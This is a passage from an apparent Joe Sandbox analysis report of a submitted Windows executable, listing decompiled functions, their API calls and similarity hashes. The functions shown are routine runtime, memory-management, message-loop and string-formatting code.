							_t75 = _v16;
							_t50 = 0;
							do {
								_t50 = _t50 + 1;
								 *_t71 = _t75;
								_t71 = _t71 + 4;
							} while (_t50 != _v8);
							goto L14;
						}
						goto L9;
					}
				}
				return _t28 | 0xffffffff;
			}

0x00e880c8
0x00e880d2
0x00e880d6
0x00e880d8
0x00e880dc
0x00e880e6
0x00e880f7
0x00e880fc
0x00e880fe
0x00e88100
0x00e88102
0x00e88104
0x00e88108
0x00e881c2
0x00e881d0
0x00e881d2
0x00e881d7
0x00e881de
0x00e881e0
0x00e881ee
0x00e881fd
0x00e88200
0x00e88202
0x00000000
0x00e88203
0x00e88110
0x00e88115
0x00e8811a
0x00e8811c
0x00e8811c
0x00e8811e
0x00e88123
0x00e88127
0x00e88127
0x00e8812a
0x00e88149
0x00e88149
0x00e8814b
0x00e8814e
0x00e88157
0x00e8815a
0x00e8815f
0x00e88162
0x00e88167
0x00000000
0x00000000
0x00e88169
0x00000000
0x00e8812c
0x00e8812c
0x00e8812e
0x00e88137
0x00e8813a
0x00e8813f
0x00e88142
0x00e88147
0x00e88171
0x00e88174
0x00e88176
0x00e88179
0x00e88181
0x00e88187
0x00e8818e
0x00e88190
0x00e88198
0x00e881a7
0x00e881ab
0x00e881ad
0x00e881b0
0x00000000
0x00000000
0x00e881b2
0x00e881b5
0x00e881b7
0x00e881b7
0x00e881b8
0x00e881ba
0x00e881bd
0x00000000
0x00e881b7
0x00000000
0x00e88147
0x00e8812a
0x00000000

APIs

_free.LIBCMT ref: 00E8813A
_free.LIBCMT ref: 00E8815A

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 6162c35870dd1bb52d57b393df0dd8567bfb7673ea07fec1778a3453628adea1
Instruction ID: f86f289cba40f5609b7c89ed722684f1c257b477b6a88ead8dd17f7563f5034d
Opcode Fuzzy Hash: 6162c35870dd1bb52d57b393df0dd8567bfb7673ea07fec1778a3453628adea1
Instruction Fuzzy Hash: 1541E236A012009FCB24EF78C985A5DB3F2EF89714B5555A9E91DFB351DB31AD01CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00E8B9A0 Relevance: 7.6, APIs: 5, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00E8B9A0() {
				int _v8;
				void* __ecx;
				void* _t6;
				int _t7;
				char* _t13;
				int _t17;
				void* _t19;
				char* _t25;
				WCHAR* _t27;

				_t27 = GetEnvironmentStringsW();
				if(_t27 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t6 = E00E8B969(_t27);
					_pop(_t19);
					_t17 = _t6 - _t27 >> 1;
					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t25 = E00E88838(_t19, _t7);
						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t25;
							_t25 = 0;
						}
						E00E887FE(_t25);
					}
				}
				if(_t27 != 0) {
					FreeEnvironmentStringsW(_t27);
				}
				return _t13;
			}

0x00e8b9af
0x00e8b9b5
0x00e8ba0d
0x00e8ba0d
0x00e8b9b7
0x00e8b9b8
0x00e8b9bd
0x00e8b9c6
0x00e8b9cc
0x00e8b9d2
0x00e8b9d7
0x00000000
0x00e8b9d9
0x00e8b9df
0x00e8b9e4
0x00e8ba02
0x00e8b9fc
0x00e8b9fc
0x00e8b9fe
0x00e8b9fe
0x00e8ba05
0x00e8ba0a
0x00e8b9d7
0x00e8ba11
0x00e8ba14
0x00e8ba14
0x00e8ba22

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00E8B9A9
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E8B9CC

Part of subcall function 00E88838: RtlAllocateHeap.NTDLL(00000000,?,?,?,00E83CF6,?,0000015D,?,?,?,?,00E851D2,000000FF,00000000,?,?), ref: 00E8886A

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00E8B9F2
_free.LIBCMT ref: 00E8BA05
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00E8BA14

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: c411dbd94196198989f74a2b52fd7459667b5300af0138427ba1ce72a7fb3f20
Instruction ID: 777fca898bdf87b191b45c37beae374c777d65f13c19458afead9bc3cfe86ea0
Opcode Fuzzy Hash: c411dbd94196198989f74a2b52fd7459667b5300af0138427ba1ce72a7fb3f20
Instruction Fuzzy Hash: 4D017562A01255BF232566B76C8DC7B6A6DDAC6BA4714116AFD0CF6111DF618D0283B0

Uniqueness

Uniqueness Score: -1.00%

Function 00E70A36 Relevance: 7.5, APIs: 5, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00E70A36(void* __ecx) {
				intOrPtr _v16;
				void* __ebp;
				int _t16;
				void** _t21;
				long* _t25;
				void* _t28;
				void* _t30;
				intOrPtr _t31;

				_t22 = __ecx;
				_push(0xffffffff);
				_push(E00E91F81);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t31;
				_t28 = __ecx;
				E00E70D11(__ecx);
				_t25 = 0;
				 *((char*)(__ecx + 0x314)) = 1;
				ReleaseSemaphore( *(__ecx + 0x318), 0x40, 0);
				if( *((intOrPtr*)(_t28 + 0x104)) > 0) {
					_t21 = _t28 + 4;
					do {
						E00E70B29(_t22, _t30,  *_t21);
						CloseHandle( *_t21);
						_t25 = _t25 + 1;
						_t21 =  &(_t21[1]);
					} while (_t25 <  *((intOrPtr*)(_t28 + 0x104)));
				}
				DeleteCriticalSection(_t28 + 0x320);
				CloseHandle( *(_t28 + 0x318));
				_t16 = CloseHandle( *(_t28 + 0x31c));
				 *[fs:0x0] = _v16;
				return _t16;
			}

0x00e70a36
0x00e70a3f
0x00e70a41
0x00e70a46
0x00e70a47
0x00e70a51
0x00e70a53
0x00e70a58
0x00e70a5a
0x00e70a6a
0x00e70a76
0x00e70a78
0x00e70a7b
0x00e70a7d
0x00e70a84
0x00e70a8a
0x00e70a8b
0x00e70a8e
0x00e70a7b
0x00e70a9d
0x00e70aa9
0x00e70ab5
0x00e70ac0
0x00e70acb

APIs

Part of subcall function 00E70D11: ResetEvent.KERNEL32(?), ref: 00E70D23
Part of subcall function 00E70D11: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00E70D37

ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00E70A6A
CloseHandle.KERNEL32(?,?), ref: 00E70A84
DeleteCriticalSection.KERNEL32(?), ref: 00E70A9D
CloseHandle.KERNEL32(?), ref: 00E70AA9
CloseHandle.KERNEL32(?), ref: 00E70AB5

Part of subcall function 00E70B29: WaitForSingleObject.KERNEL32(?,000000FF,00E70C48,?,?,00E70CBF,?,?,?,?,?,00E70CA9), ref: 00E70B2F
Part of subcall function 00E70B29: GetLastError.KERNEL32(?,?,00E70CBF,?,?,?,?,?,00E70CA9), ref: 00E70B3B

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: e3ac6fe27646efdf23d069afb52d9a27bf30f51525231b815448a6aa656d1824
Instruction ID: 292fdbd4055b2b431bb2c472fcb2bfc82de3b31343d97e138f35bb504c7cddeb
Opcode Fuzzy Hash: e3ac6fe27646efdf23d069afb52d9a27bf30f51525231b815448a6aa656d1824
Instruction Fuzzy Hash: 46015271540704EFC7329B65DC85FC6BBE9FB49710F00455AF15E62161CB756A48CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00E8C26F Relevance: 7.5, APIs: 5, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00E8C26F(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0xe9ed50; // 0xe9ed44
					if(_t23 != 0) {
						E00E887FE(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0xe9ed54; // 0xec1704
					if(_t24 != 0) {
						E00E887FE(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0xe9ed58; // 0xec1704
					if(_t25 != 0) {
						E00E887FE(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0xe9ed80; // 0xe9ed48
					if(_t26 != 0) {
						E00E887FE(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0xe9ed84; // 0xec1708
					if(_t27 != 0) {
						return E00E887FE(_t6);
					}
				}
				return _t6;
			}

0x00e8c275
0x00e8c27a
0x00e8c27e
0x00e8c284
0x00e8c287
0x00e8c28c
0x00e8c290
0x00e8c296
0x00e8c299
0x00e8c29e
0x00e8c2a2
0x00e8c2a8
0x00e8c2ab
0x00e8c2b0
0x00e8c2b4
0x00e8c2ba
0x00e8c2bd
0x00e8c2c2
0x00e8c2c3
0x00e8c2c6
0x00e8c2cc
0x00000000
0x00e8c2d4
0x00e8c2cc
0x00e8c2d7

APIs

_free.LIBCMT ref: 00E8C287

Part of subcall function 00E887FE: RtlFreeHeap.NTDLL(00000000,00000000,?,00E8C306,?,00000000,?,00000000,?,00E8C32D,?,00000007,?,?,00E8C72A,?), ref: 00E88814
Part of subcall function 00E887FE: GetLastError.KERNEL32(?,?,00E8C306,?,00000000,?,00000000,?,00E8C32D,?,00000007,?,?,00E8C72A,?,?), ref: 00E88826

_free.LIBCMT ref: 00E8C299
_free.LIBCMT ref: 00E8C2AB
_free.LIBCMT ref: 00E8C2BD
_free.LIBCMT ref: 00E8C2CF

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d5ddae27746c21566b8abea3f7dbfe16f0ba054b101e246e2800b31fefdfe7b8
Instruction ID: fcf1efb39eb23f2c71e3952168af68ffc7a0d8c8f16a6ac47a6dc56d217769f2
Opcode Fuzzy Hash: d5ddae27746c21566b8abea3f7dbfe16f0ba054b101e246e2800b31fefdfe7b8
Instruction Fuzzy Hash: 2AF0FF73504604BB8620FBAAEAC5C5A73E9BB417287B42807F50DFB660CE31FC844764

Uniqueness

Uniqueness Score: -1.00%

Function 00E7AF04 Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E7AF04() {
				struct tagMSG _v32;
				int _t7;
				struct HWND__* _t10;

				_t7 = PeekMessageW( &_v32, 0, 0, 0, 0);
				if(_t7 != 0) {
					GetMessageW( &_v32, 0, 0, 0);
					_t10 =  *0xea8458; // 0x202b6
					if(_t10 == 0) {
						L3:
						TranslateMessage( &_v32);
						return DispatchMessageW( &_v32);
					}
					_t7 = IsDialogMessageW(_t10,  &_v32);
					if(_t7 == 0) {
						goto L3;
					}
				}
				return _t7;
			}

0x00e7af15
0x00e7af1d
0x00e7af26
0x00e7af2c
0x00e7af33
0x00e7af44
0x00e7af48
0x00000000
0x00e7af52
0x00e7af3a
0x00e7af42
0x00000000
0x00000000
0x00e7af42
0x00e7af5c

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00E7AF15
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E7AF26
IsDialogMessageW.USER32(000202B6,?), ref: 00E7AF3A
TranslateMessage.USER32(?), ref: 00E7AF48
DispatchMessageW.USER32(?), ref: 00E7AF52

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: bf7c1513d9d865ef93c15ffb82d8e9be480d69017de8978acfb9dfc15acafed5
Instruction ID: 4287b203662126317a8cb179ba5b2727837b3792e309edba10611eb77cab1d17
Opcode Fuzzy Hash: bf7c1513d9d865ef93c15ffb82d8e9be480d69017de8978acfb9dfc15acafed5
Instruction Fuzzy Hash: B0F01D71A01219AF8B24ABA29C4DDEF7F6CEF05251744842AF619E2140EA25D40AC7F1

Uniqueness

Uniqueness Score: -1.00%

Function 00E71107 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 198
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E00E71107(intOrPtr* __ecx) {
				char _v516;
				char _v5636;
				signed int _t32;
				signed int _t43;
				signed int _t44;
				signed int _t45;
				signed int _t47;
				void* _t59;
				void* _t60;

				_t50 = __ecx;
				E00E7E630();
				_t54 = __ecx;
				_t32 =  *(__ecx + 0x48);
				_t59 = _t32 - 0x72;
				if(_t59 > 0) {
					__eflags = _t32 - 0x80;
					if(_t32 == 0x80) {
						E00E7CFE4();
						__eflags =  *(_t54 + 4);
						if( *(_t54 + 4) == 0) {
							E00E70131( &_v5636, E00E6E0AC(_t50, 0xc9), 0xa00);
						} else {
							E00E63F8F( &_v5636, 0xa00, E00E6E0AC(_t50, 0xca),  *(_t54 + 4));
						}
						_t32 = E00E7A195( *0xea844c,  &_v5636, E00E6E0AC(_t50, 0x96), 0);
					}
					L64:
					return _t32;
				}
				if(_t59 == 0) {
					_push(0x456);
					L38:
					_push(E00E6E0AC(_t50));
					_push( *_t54);
					L19:
					_t32 = E00E7B118();
					L11:
					goto L64;
				}
				_t60 = _t32 - 0x16;
				if(_t60 > 0) {
					__eflags = _t32 - 0x38;
					if(__eflags > 0) {
						_t43 = _t32 - 0x39;
						__eflags = _t43;
						if(_t43 == 0) {
							_push(0x8c);
							goto L38;
						}
						_t44 = _t43 - 1;
						__eflags = _t44;
						if(_t44 == 0) {
							_push(0x6f);
							goto L38;
						}
						_t45 = _t44 - 1;
						__eflags = _t45;
						if(_t45 == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							_push(0x406);
							L13:
							_push(E00E6E0AC(_t50));
							_push( *_t54);
							L8:
							_t32 = E00E7B118();
							goto L64;
						}
						_t47 = _t45 - 9;
						__eflags = _t47;
						if(_t47 == 0) {
							_push(0x343);
							goto L38;
						}
						_t32 = _t47 - 1;
						__eflags = _t32;
						if(_t32 != 0) {
							goto L64;
						}
						_push(0x86);
						goto L38;
					}
					if(__eflags == 0) {
						_push(0x67);
						goto L38;
					}
					_t32 = _t32 - 0x17;
					__eflags = _t32 - 0xb;
					if(_t32 > 0xb) {
						goto L64;
					}
					switch( *((intOrPtr*)(_t32 * 4 +  &M00E71417))) {
						case 0:
							_push(0xde);
							goto L18;
						case 1:
							_push(0xe1);
							L18:
							_push(E00E6E0AC(_t50));
							_push(0);
							goto L19;
						case 2:
							_push(0xb4);
							goto L38;
						case 3:
							_push(0x69);
							goto L38;
						case 4:
							_push(0x6a);
							goto L38;
						case 5:
							_push( *((intOrPtr*)(__esi + 4)));
							_push(0x68);
							goto L13;
						case 6:
							_push(0x46f);
							goto L38;
						case 7:
							_push(0x470);
							goto L38;
						case 8:
							_push( *((intOrPtr*)(__esi + 4)));
							_push(0x471);
							goto L13;
						case 9:
							goto L64;
						case 0xa:
							_push( *((intOrPtr*)(__esi + 4)));
							_push(0x71);
							goto L13;
						case 0xb:
							E00E6E0AC(__ecx, 0xc8) =  &_v516;
							__eax = E00E63F8F( &_v516, 0x100,  &_v516,  *((intOrPtr*)(__esi + 4)));
							_push( *((intOrPtr*)(__esi + 8)));
							__eax =  &_v516;
							_push( &_v516);
							__eax = E00E7B118( *__esi, L"%s: %s");
							goto L64;
					}
				}
				if(_t60 == 0) {
					_push( *__ecx);
					_push(0xdd);
					L23:
					E00E6E0AC(_t50);
					L7:
					_push(0);
					goto L8;
				}
				if(_t32 > 0x15) {
					goto L64;
				}
				switch( *((intOrPtr*)(_t32 * 4 +  &M00E713BF))) {
					case 0:
						_push( *__esi);
						_push(L"%ls");
						_push(">");
						goto L8;
					case 1:
						_push( *__ecx);
						_push(L"%ls");
						goto L7;
					case 2:
						_push(0);
						__eax = E00E7A888();
						goto L11;
					case 3:
						_push( *((intOrPtr*)(__esi + 4)));
						_push(0x7b);
						goto L13;
					case 4:
						_push( *((intOrPtr*)(__esi + 4)));
						_push(0x7a);
						goto L13;
					case 5:
						_push( *((intOrPtr*)(__esi + 4)));
						_push(0x7c);
						goto L13;
					case 6:
						_push( *((intOrPtr*)(__esi + 4)));
						_push(0xca);
						goto L13;
					case 7:
						_push(0x70);
						goto L18;
					case 8:
						_push( *((intOrPtr*)(__esi + 4)));
						_push(0x72);
						goto L13;
					case 9:
						_push( *((intOrPtr*)(__esi + 4)));
						_push(0x78);
						goto L13;
					case 0xa:
						_push( *__esi);
						_push(0x85);
						goto L23;
					case 0xb:
						_push( *__esi);
						_push(0x204);
						goto L23;
					case 0xc:
						_push( *((intOrPtr*)(__esi + 4)));
						_push(0x84);
						goto L13;
					case 0xd:
						_push( *((intOrPtr*)(__esi + 4)));
						_push(0x83);
						goto L13;
					case 0xe:
						goto L64;
					case 0xf:
						_push( *((intOrPtr*)(__esi + 8)));
						_push( *((intOrPtr*)(__esi + 4)));
						E00E6E0AC(__ecx, 0xd2) = E00E7B118( *__esi, __eax);
						goto L64;
					case 0x10:
						_push( *((intOrPtr*)(__esi + 4)));
						_push(0x79);
						goto L13;
					case 0x11:
						_push( *((intOrPtr*)(__esi + 4)));
						_push(0xdc);
						goto L13;
				}
			}

0x00e71107
0x00e7110f
0x00e71115
0x00e71117
0x00e7111a
0x00e7111d
0x00e71348
0x00e7134d
0x00e7134f
0x00e71354
0x00e71358
0x00e71395
0x00e7135a
0x00e71374
0x00e71379
0x00e713b4
0x00e713b4
0x00e713b9
0x00e713bd
0x00e713bd
0x00e71123
0x00e7133e
0x00e71267
0x00e7126c
0x00e7126d
0x00e711aa
0x00e711aa
0x00e71173
0x00000000
0x00e71173
0x00e71129
0x00e7112c
0x00e7122c
0x00e7122f
0x00e712ef
0x00e712ef
0x00e712f2
0x00e71334
0x00000000
0x00e71334
0x00e712f4
0x00e712f4
0x00e712f7
0x00e7132d
0x00000000
0x00e7132d
0x00e712f9
0x00e712f9
0x00e712fc
0x00e71320
0x00e71323
0x00e7117e
0x00e71183
0x00e71184
0x00e71151
0x00e71151
0x00000000
0x00e71156
0x00e712fe
0x00e712fe
0x00e71301
0x00e71316
0x00000000
0x00e71316
0x00e71303
0x00e71303
0x00e71306
0x00000000
0x00000000
0x00e7130c
0x00000000
0x00e7130c
0x00e71235
0x00e712e8
0x00000000
0x00e712e8
0x00e7123b
0x00e7123e
0x00e71241
0x00000000
0x00000000
0x00e71247
0x00000000
0x00e7124e
0x00000000
0x00000000
0x00e71258
0x00e711a2
0x00e711a7
0x00e711a8
0x00000000
0x00000000
0x00e71262
0x00000000
0x00000000
0x00e71274
0x00000000
0x00000000
0x00e71278
0x00000000
0x00000000
0x00e7127c
0x00e7127f
0x00000000
0x00000000
0x00e71286
0x00000000
0x00000000
0x00e7128d
0x00000000
0x00000000
0x00e71294
0x00e71297
0x00000000
0x00000000
0x00000000
0x00000000
0x00e712a1
0x00e712a4
0x00000000
0x00000000
0x00e712b9
0x00e712c5
0x00e712ca
0x00e712cd
0x00e712d3
0x00e712db
0x00000000
0x00000000
0x00e71247
0x00e71132
0x00e71223
0x00e71225
0x00e711c7
0x00e711c7
0x00e7114f
0x00e7114f
0x00000000
0x00e7114f
0x00e7113b
0x00000000
0x00000000
0x00e71141
0x00000000
0x00e7115e
0x00e71160
0x00e71165
0x00000000
0x00000000
0x00e71148
0x00e7114a
0x00000000
0x00000000
0x00e7116c
0x00e7116e
0x00000000
0x00000000
0x00e71179
0x00e7117c
0x00000000
0x00000000
0x00e71188
0x00e7118b
0x00000000
0x00000000
0x00e7118f
0x00e71192
0x00000000
0x00000000
0x00e71196
0x00e71199
0x00000000
0x00000000
0x00e711a0
0x00000000
0x00000000
0x00e711b2
0x00e711b5
0x00000000
0x00000000
0x00e711b9
0x00e711bc
0x00000000
0x00000000
0x00e711c0
0x00e711c2
0x00000000
0x00000000
0x00e711cf
0x00e711d1
0x00000000
0x00000000
0x00e711d8
0x00e711db
0x00000000
0x00000000
0x00e711e2
0x00e711e5
0x00000000
0x00000000
0x00000000
0x00000000
0x00e711ec
0x00e711ef
0x00e711ff
0x00000000
0x00000000
0x00e7120c
0x00e7120f
0x00000000
0x00000000
0x00e71216
0x00e71219
0x00000000
0x00000000

APIs

_swprintf.LIBCMT ref: 00E712C5
_swprintf.LIBCMT ref: 00E71374

Strings

%s: %s, xrefs: 00E712D4
%ls, xrefs: 00E7114A, 00E71160

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: 1ea979118d580cbd043082400c087a1bf8218ed6a5a786d02a802eca383c3aa7
Instruction ID: 871e3f8a0525e71b80a42a2b2fc32a73777322be30a024469854828fe20de559
Opcode Fuzzy Hash: 1ea979118d580cbd043082400c087a1bf8218ed6a5a786d02a802eca383c3aa7
Instruction Fuzzy Hash: DD510B75389304FAE6222AEC9D03FB676D9AB05B00F60E586F38EBC9E2C5A154107713

Uniqueness

Uniqueness Score: -1.00%

Function 00E8798E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00E8798E(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t36;
				struct HINSTANCE__* _t37;
				struct HINSTANCE__* _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				CHAR* _t49;
				struct HINSTANCE__* _t50;
				void* _t52;
				struct HINSTANCE__* _t55;
				intOrPtr* _t59;
				struct HINSTANCE__* _t64;
				intOrPtr _t65;

				_t52 = __ecx;
				if(_a4 == 2 || _a4 == 1) {
					E00E8B5A0(_t52);
					GetModuleFileNameA(0, 0xec1130, 0x104);
					_t49 =  *0xec16e0; // 0x3093308
					 *0xec16e8 = 0xec1130;
					if(_t49 == 0 ||  *_t49 == 0) {
						_t49 = 0xec1130;
					}
					_v8 = 0;
					_v16 = 0;
					E00E87AB2(_t52, _t49, 0, 0,  &_v8,  &_v16);
					_t64 = E00E87C27(_v8, _v16, 1);
					if(_t64 != 0) {
						E00E87AB2(_t52, _t49, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
						if(_a4 != 1) {
							_v12 = 0;
							_push( &_v12);
							_t50 = E00E8B0B3(_t49, 0, _t64, _t64);
							if(_t50 == 0) {
								_t59 = _v12;
								_t55 = 0;
								_t36 = _t59;
								if( *_t59 == 0) {
									L15:
									_t37 = 0;
									 *0xec16d4 = _t55;
									_v12 = 0;
									_t50 = 0;
									 *0xec16d8 = _t59;
									L16:
									E00E887FE(_t37);
									_v12 = 0;
									goto L17;
								} else {
									goto L14;
								}
								do {
									L14:
									_t36 = _t36 + 4;
									_t55 =  &(_t55->i);
								} while ( *_t36 != 0);
								goto L15;
							}
							_t37 = _v12;
							goto L16;
						}
						 *0xec16d4 = _v8 - 1;
						_t43 = _t64;
						_t64 = 0;
						 *0xec16d8 = _t43;
						goto L10;
					} else {
						_t44 = E00E88C7A();
						_push(0xc);
						_pop(0);
						 *_t44 = 0;
						L10:
						_t50 = 0;
						L17:
						E00E887FE(_t64);
						return _t50;
					}
				} else {
					_t45 = E00E88C7A();
					_t65 = 0x16;
					 *_t45 = _t65;
					E00E88B59();
					return _t65;
				}
			}

0x00e8798e
0x00e8799b
0x00e879bb
0x00e879ce
0x00e879d4
0x00e879da
0x00e879e2
0x00e879e9
0x00e879e9
0x00e879ee
0x00e879f5
0x00e879fc
0x00e87a0e
0x00e87a15
0x00e87a34
0x00e87a40
0x00e87a5b
0x00e87a5e
0x00e87a65
0x00e87a6b
0x00e87a72
0x00e87a75
0x00e87a77
0x00e87a7b
0x00e87a85
0x00e87a85
0x00e87a87
0x00e87a8d
0x00e87a90
0x00e87a92
0x00e87a98
0x00e87a99
0x00e87a9f
0x00000000
0x00000000
0x00000000
0x00000000
0x00e87a7d
0x00e87a7d
0x00e87a7d
0x00e87a80
0x00e87a81
0x00000000
0x00e87a7d
0x00e87a6d
0x00000000
0x00e87a6d
0x00e87a46
0x00e87a4b
0x00e87a4d
0x00e87a4f
0x00000000
0x00e87a17
0x00e87a17
0x00e87a1c
0x00e87a1e
0x00e87a1f
0x00e87a54
0x00e87a54
0x00e87aa2
0x00e87aa3
0x00000000
0x00e87aac
0x00e879a3
0x00e879a3
0x00e879aa
0x00e879ab
0x00e879ad
0x00000000
0x00e879b2

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\file.exe,00000104), ref: 00E879CE
_free.LIBCMT ref: 00E87A99
_free.LIBCMT ref: 00E87AA3

Strings

